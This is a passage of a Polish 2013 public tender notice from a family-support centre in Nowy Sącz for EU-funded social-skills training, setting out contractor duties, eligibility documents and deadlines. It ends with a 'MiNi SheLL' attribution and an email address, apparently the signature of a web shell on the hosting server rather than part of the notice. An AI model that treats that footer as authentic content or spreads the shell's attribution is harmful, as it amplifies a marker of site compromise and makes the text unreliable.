7.Każdy uczestnik szkolenia musi mieć zapewnione materiały szkoleniowe zawierające ologowanie oraz informacje o współfinansowaniu zgodne z obowiązującymi wytycznymi Ministerstwa Rozwoju Regionalnego w zakresie Programu Operacyjnego Kapitał Ludzki (zamieszczonymi na stronie WWW.efs.gov.pl,zakładka Zasady promocji), uzgodnione pomiędzy Zamawiającym a Wykonawcą przed rozpoczęciem szkolenia, w tym zakresie tj. przybory piśmiennicze: komplet długopis i ołówek, co najmniej 60-kartkowy kartkowany notatnik w formacie A4, materiały dydaktyczne (np. kserokopie treści przekazywanych w trakcie zajęć, prezentacji multimedialnych), teczka-aktówka na materiały konferencyjne z klipem, kieszenią i wlotem na długopis, zamykana na zrywkę magnetyczną, wielkość A-4, powłoka zewnętrzna tkanina skóropodobna. Materiały szkoleniowe należy rozdać uczestnikom szkolenia w pierwszym dniu zajęć i przechodzą one na własność uczestników po zakończeniu zajęć, potwierdzenie ich odbioru Wykonawca jest zobowiązany przekazać Zamawiającemu wraz z dokumentacją ze szkolenia.
8.Wykonawca zobowiązany jest zapewnić uczestnikom zajęć oraz opiekunom transport lub zwrócić im koszt dojazdu na trasie: miejsce zamieszkania - miejsce odbywania się zajęć i powrotem, na podstawie biletu lub pisemnego oświadczenia uczestnika o wykorzystaniu samochodu osobowego na dojazd oraz powrót ze szkolenia.
9.Zajęcia mają się zakończyć badaniem ewaluacyjnym, przeprowadzonym w formie pisemnej, sprawdzającym nabycie, utrwalenie umiejętności  społecznych oraz wzmocnienie kompetencji uczestników szkolenia.
10.Wykonawca zobowiązany jest zapewnić bezpieczeństwo osób uczestniczących w zajęciach, a także warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy.
11.Zamawiający przekaże Wykonawcy imienną listę uczestników z danymi niezbędnymi do prawidłowego wykonania zamówienia przed rozpoczęciem realizacji usługi. 
12.Wykonawca zobowiązuje się udzielać na żądanie Zamawiającego informacji dotyczących stanu realizacji przedmiotu zamówienia (np. liczby osób uczestniczących w zajęciach itp.).
13.Wykonawca zobowiązany jest do przekazania uczestnikom zajęć informacji na temat współfinansowania przedmiotu zamówienia przez Unię Europejską ze środków Europejskiego Funduszu Społecznego i przekazać Zamawiającemu jedno pisemne oświadczenie w tej sprawie potwierdzającego wykonanie ww wymagania.
14.Wykonawca umożliwi pracownikom Zamawiającego przeprowadzenie kontroli prawidłowości realizacji usługi oraz podda się ewentualnej kontroli Instytucji Wdrażającej (Wojewódzki Urząd Pracy w Krakowie), a także udzieli stosownych wyjaśnień w obszarze związanym z przedmiotem zamówienia, na każde jego żądanie. 
15.Wykonawca przekaże Zamawiającemu oryginały z dokumentacji z zajęć w terminie 7 dni od zakończenia każdego z zadań. Dokumentacja zajęć powinna być oznakowana zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, zamieszczonymi na stronie internetowej: www.efs.gov.pl, zakładka - Zasady promocji.
16.Wykonawca zobowiązany jest do przeprowadzenia zajęć także w przypadku innej od wymienionej liczby osób w SIWZ. Zamawiający zastrzega sobie, w uzasadnionych przypadkach, prawo zmiany liczby uczestników zajęć. Zamawiający zapłaci Wykonawcy za faktyczną liczbę osób, które zakończą zajęcia na podstawie przekazanej dokumentacji zgodnie z pkt. 5. 
17.Wykonawca zobowiązany jest do sprawowania nadzoru nad frekwencją uczestników zajęć, a także bieżącego informowania osoby wyznaczonej po stronie Zamawiającego o każdej nieobecności osoby, która planowo powinna uczestniczyć w zajęciach.
18.Wykonawca wyznacza osobę do kontaktu (koordynator) - sprawującą nadzór nad realizacją przedmiotu zamówienia, odpowiedzialną za organizację i informowanie o planowanych zajęciach, ściśle współpracującą z osobą wyznaczoną po stronie Zamawiającego.
19.Wykonawca zobowiązany będzie do oznakowania miejsca zajęć oraz wszelkich dokumentów związanych z realizacją usługi zgodnie z Wytycznymi Ministerstwa Rozwoju Regionalnego dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (zamieszczonymi na stronie www.efs.gov.pl, zakładka Zasady promocji), tj. umieszczania informacji: Projekt W stronę samodzielności i niezależności jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki oraz logotypu Programu Kapitał Ludzki oraz logo Unii Europejskiej wraz z odniesieniem (podpisem) Europejski Fundusz Społeczny.
20.Zamawiający dopuszcza wykonanie części zamówienia przy posłużeniu się innymi podmiotami - podwykonawcami. Jeżeli Wykonawca powierzy część zamówienia podwykonawcom, to Zamawiający na podstawie art. 36 ust. 4 ustawy żąda wskazania przez Wykonawcę w ofercie te części zamówienia, której wykonanie powierzy podwykonawcom. 
21.Zamawiający nie dopuszcza możliwości prowadzenia zajęć metodą e- learning. 
22.Wykonawca zobowiązany jest zapewnić dla każdego uczestnika zajęć ubezpieczenie NNW w trakcie jego trwania, a także w drodze na nie i z powrotem na kwotę minimalną 5 000 zł. Kserokopię dokumentu potwierdzającego ubezpieczenie Wykonawca przedłoży Zamawiającemu przed rozpoczęciem zajęć. 
23.Wykonawca wystawi rachunek,fakturę  po zakończeniu zadania..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 ustawy Prawo zamówień publicznych do wysokości 50 % wartości zamówienia przetargowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże wykonanie w przeciągu ostatnich 3 lat co najmniej, jednej usługi wskazanej dla zakresu - przedmiotu; (łącznie lub odrębnie )dla każdego zadania nr I II,III,IV. przeprowadzonych w ramach realizacji projektów współfinansowanych ze środków Europejskiego Funduszu Społecznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (należyte wykonanie usług winno być potwierdzone dokumentami np. referencjami).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże, że osoba,osoby prowadzące posiadają wiedzę i doświadczenie w prowadzeniu zajęć z zakresu objętego niniejszym zamówieniem; tj. wykształcenie wyższe i uprawnienia do prowadzenia poradnictwa psychologicznego lub prowadzenia zajęć socjoterapeutycznych na grupę. Posiadającego doświadczenie w prowadzeniu szkoleń lub warsztatów lub treningów z obszaru pomocy i integracji społecznej w tym w zakresie treningów kompetencji społecznych lub psychospołecznych lub życiowych lub podstawowych dla osób niepełnosprawnych; do prowadzenia warsztatów i ćwiczeń w przedmiotowym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wymagania dotyczące dokumentów składanych przez wykonawców, o których mowa w pkt 11 SIWZ, reguluje m.in. rozporządzenie Prezesa Rady Ministrów z 19 luty 2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. z r.2013 poz.231).
2. Oświadczenia, o których mowa w pkt 11.2.1 SIWZ należy przedstawić w oryginale, pozostałe dokumenty wskazane w pkt 11 SIWZ mogą być przedstawione w formie oryginału  lub kopii poświadczonej i opatrzonej klauzulą za zgodność z oryginałem przez Wykonawcę (tj. osoby posiadające umocowanie prawne do reprezentowania firmy lub przez umocowanego Pełnomocnika). 
3. Dokument wielostronicowy przedłożony w formie kopii winien być potwierdzony za zgodność z oryginałem na każdej zapisanej (ponumerowanej) stronie.
4. W przypadku gdy Wykonawcę reprezentuje Pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika zakres pełnomocnictwa, z którego wynika zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy. 
5. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego pełnomocnictwo należy dołączyć do oferty.
6. Pełnomocnictwo powinno być złożone w oryginale albo w kopii poświadczonej notarialnie.
7. Dokumenty, oświadczenia oraz pełnomocnictwa sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 
8. W przypadku wykonawców wspólnie ubiegających się udzielenie zamówienia oraz w przypadku podmiotów, o których  mowa w pkt 11.2.3. SIWZ kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem przez Wykonawcę lub te podmioty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą w szczególności terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od zamawiającego lub wykonawcy, jak i dotyczyć mogą ustalenia ostatecznej wysokości należnego wynagrodzenia, w przypadku zmniejszenia liczby uczestników zajęć w stosunku do zapisów specyfikacji. Dopuszczone zmiany umowy j.w., zostaną wprowadzone w drodze aneksu do umowy. 
Istotne zmiany postanowień umowy mogą także wynikać z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr-ns.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu, 
ul. Kilińskiego 72 A, 
33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2013 godzina 12:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu, ul. Kilińskiego 72 A, 
33-300 Nowy Sącz, sekretariat pok. Nr 113..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach Projektu pn W stronę samodzielności i niezależności współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com